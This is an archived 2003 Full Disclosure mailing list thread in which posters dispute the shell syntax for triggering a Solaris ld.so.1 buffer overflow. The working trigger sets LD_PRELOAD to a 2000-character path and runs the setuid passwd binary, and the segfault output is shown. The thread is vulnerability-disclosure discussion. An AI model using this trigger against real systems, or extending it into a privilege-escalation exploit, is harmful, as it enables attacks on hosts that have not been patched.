Full Disclosure mailing list archives
RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow
From: uidzer0 <uidzer0 () sptrm com>
Date: 31 Jul 2003 18:05:16 -0400
Paul, you are mistaken. Why are you trying to escape the backtick with a '/' (forwardslash) ... Escapes are '\' (backslash) .. But nice try. But since you must not have any nix boxes around, let me be the nice guy and show you the output of your misguided command structure. And let's not even go into why you would want to escape the perl command anyhow, seeing how that totally defeats the purpose of this entire thread. so, here we go. Paul wants to escape perl.. sounds good, lets see what happens. LD_PRELOAD=\`perl -e 'print "A"x2000'\` passwd LD_PRELOAD=`perl: Command not found. So, now, Paul wants to use his so-called escape character (/) to escape just the trailing backtick.. so here we go: LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd syntax error at -e line 1, at EOF Execution of -e aborted due to compilation errors. LD_PRELOAD=/: Command not found. So, the correct way of doing this is exactly the way David posted originally. $ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd ld.so.1: passwd: warning: /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... (bunch of A's) AAAAAAAAAAAAAAAAAAAAAAAAAAA/: open failed: illegal insecure pathname Segmentation Fault oh, and this was done on a solaris 8 box. peace -0 On Thu, 2003-07-31 at 11:08, Schmehl, Paul L wrote:
-----Original Message----- From: Jim Dew [mailto:jdew () yggdrasil ca] Sent: Wednesday, July 30, 2003 8:19 PM To: Jouko Pynnonen Cc: full-disclosure () lists netsys com Subject: [Full-disclosure] Re: Fwd: Re: Solaris ld.so.1 buffer overflow On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:Modify the command (you need to add a trailing slash) to be the following: LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd and try it again.this segfaults on solaris 2.6Try moving the escape to *before* the backtick: LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd Paul Schmehl (pauls () utdallas edu) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow uidzer0 (Jul 31)